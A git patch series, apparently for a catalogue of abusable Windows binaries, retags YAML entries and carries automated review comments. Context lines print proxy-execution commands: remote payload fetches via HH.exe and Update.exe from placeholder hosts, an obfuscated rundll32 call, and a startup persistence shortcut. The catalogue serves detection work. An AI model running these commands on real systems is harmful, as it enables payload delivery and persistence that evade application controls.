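Review bot: In the second Wmic hunk the context line `Description: Create a volume shadow copy of NTDS.dit that can be copied.` sits directly under `- Command: wmic.exe process get brief /format:"https://.../Wmic_calc.xsl"`, and the two do not describe the same technique — the command loads a remote XSL stylesheet, the description is shadow-copy creation — so the retag to `- Execute: CMD` goes in with this mismatch still in place. Most likely either the Command or the Description was carried over from a neighbouring entry; confirm against the file and, if the XSL command is the intended one, replace the description with something like `Description: Executes script embedded in the remote XSL stylesheet loaded via /format.`. The `- Execute: Remote` tag on the visible lines belongs to the preceding `/node:` entry, not to this one; the XSL entry's own Tags fall outside the hunk.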
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection:
diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml
index a96fe54f..b83e0e7e 100644
--- a/yml/OSBinaries/wt.yml
+++ b/yml/OSBinaries/wt.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe
Detection:
diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml
index 6ee5a3f3..e75c0a68 100644
--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: URL
Full_Path:
- Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll
diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml
index 7514068c..52e973e9 100644
--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: URL
Full_Path:
- Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll
diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml
index 29b58e9f..608f69d3 100644
--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: URL
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index 250f1009..a57f1b99 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:
diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml
index 59a4a8c3..b23da74c 100644
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1216
OperatingSystem: Windows 10
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml
index 783eea71..963cf0ba 100644
--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@@ -12,7 +12,6 @@ Commands:
MitreID: T1216
OperatingSystem: Windows 10
Tags:
- - Execute: EXE
- Execute: CMD
Full_Path:
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml
index 10e39e50..7f71efb7 100644
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1216.002
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Detection:
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml
index 5e16964e..cb86feb9 100644
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:
diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml
index 5f0e1564..7e375cc0 100644
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@@ -32,8 +32,7 @@ Commands:
MitreID: T1220
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: CMD
- - Execute: Remote
+ - Execute: XSL
Full_Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs
diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml
index 40140642..23154c19 100644
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
index 3517a54f..5e95bac2 100644
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml
index bae245ee..2a158666 100644
--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
Tags:
- - Execute: Csharp
+ - Execute: CSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml
index 61b19efd..a72e4b68 100644
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample:
diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml
index 952594d7..f6f9eeae 100644
--- a/yml/OtherMSBinaries/Devtoolslauncher.yml
+++ b/yml/OtherMSBinaries/Devtoolslauncher.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:
diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml
index eb613494..f54457e1 100644
--- a/yml/OtherMSBinaries/Dnx.yml
+++ b/yml/OtherMSBinaries/Dnx.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
Tags:
- - Execute: Csharp
+ - Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml
index 57de2447..16b369ed 100644
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- - Execute: .NetDLL
+ - Execute: DLL (.NET)
- Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code
@@ -30,7 +30,7 @@ Commands:
MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- - Execute: Fsharp
+ - Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
@@ -39,7 +39,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10 and up with .NET Core installed
Tags:
- - Execute: CSProj
+ - Execute: CSharp
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml
index c770ad2a..6058ea53 100644
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- - Execute: Fsharp
+ - Execute: FSharp
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -21,7 +21,7 @@ Commands:
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- - Execute: Fsharp
+ - Execute: FSharp
Full_Path:
- Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml
index 2a8f79c6..4241cbe4 100644
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- - Execute: Fsharp
+ - Execute: FSharp
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -21,7 +21,7 @@ Commands:
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- - Execute: Fsharp
+ - Execute: FSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml
index d39ab320..7090e1e7 100644
--- a/yml/OtherMSBinaries/Rcsi.yml
+++ b/yml/OtherMSBinaries/Rcsi.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
Tags:
- - Execute: Csharp
+ - Execute: CSharp
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
Tags:
- - Execute: Csharp
+ - Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml
index aaa583e7..e495ef0d 100644
--- a/yml/OtherMSBinaries/Sqlps.yml
+++ b/yml/OtherMSBinaries/Sqlps.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml
index 44835607..b7c66aa0 100644
--- a/yml/OtherMSBinaries/Sqltoolsps.yml
+++ b/yml/OtherMSBinaries/Sqltoolsps.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- - Execute: Powershell
+ - Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample:
diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml
index 8cfa5433..622843c1 100644
--- a/yml/OtherMSBinaries/Teams.yml
+++ b/yml/OtherMSBinaries/Teams.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: Javascript
+ - Execute: Node.JS
- Command: teams.exe
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
Usecase: Execute JavaScript code
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: Javascript
+ - Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary
diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml
index c0b51ae3..1dde3d0a 100644
--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@@ -79,7 +79,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- - Execute: Nuget
+ - Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -109,7 +109,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml
index ba2b6ba9..17136781 100644
--- a/yml/OtherMSBinaries/VSDiagnostics.yml
+++ b/yml/OtherMSBinaries/VSDiagnostics.yml
@@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Detection:
diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml
index 806df6d0..40dd2058 100644
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- - Execute: Csharp
+ - Execute: XOML
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index 11d34d9a..92970b54 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -21,7 +21,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- - Execute: EXE
+ - Execute: CMD
- Command: wsl.exe --exec bash -c ""
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `)
Usecase: Performs execution of arbitrary Linux commands.
From b46fc3f8c242a44d5d0f3e65e81aaad1cda3a8fa Mon Sep 17 00:00:00 2001
From: Wietze
Date: Wed, 20 Nov 2024 23:24:00 +0000
Subject: [PATCH 148/148] Fixing issue with hh.yml
---
yml/OSBinaries/Hh.yml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
index fd09accc..27af482f 100644
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -14,6 +14,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
+ - Command: HH.exe c:\windows\system32\calc.exe
+ Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
@@ -22,6 +24,7 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
+ - Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
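Review bot: Both Hh.yml hunks add their `- Command:` lines directly under context tags that still read `- Execute: EXE`, while every other file touched in this patch series rewrites that value to `- Execute: CMD` (Schtasks, Ssh, Wmic, wt, DefaultPack, ...) or `- Execute: URL` (ieframe, shdocvw, url.dll), and the Cl_invocation hunk drops `EXE` outright. If `EXE` has been retired from the tag vocabulary, the repository's schema check (where tag values are enumerated) will reject Hh.yml once these entries are complete; confirm the value is still accepted, or change both tags to `- Execute: CMD`. Whether `EXE` remains in the schema cannot be verified from this diff alone. Note that a Tags list is the last key of the entry it belongs to, so the `Execute: EXE` lines here describe the entries above the added Command lines, and the new entries' own Tags lie outside the hunks.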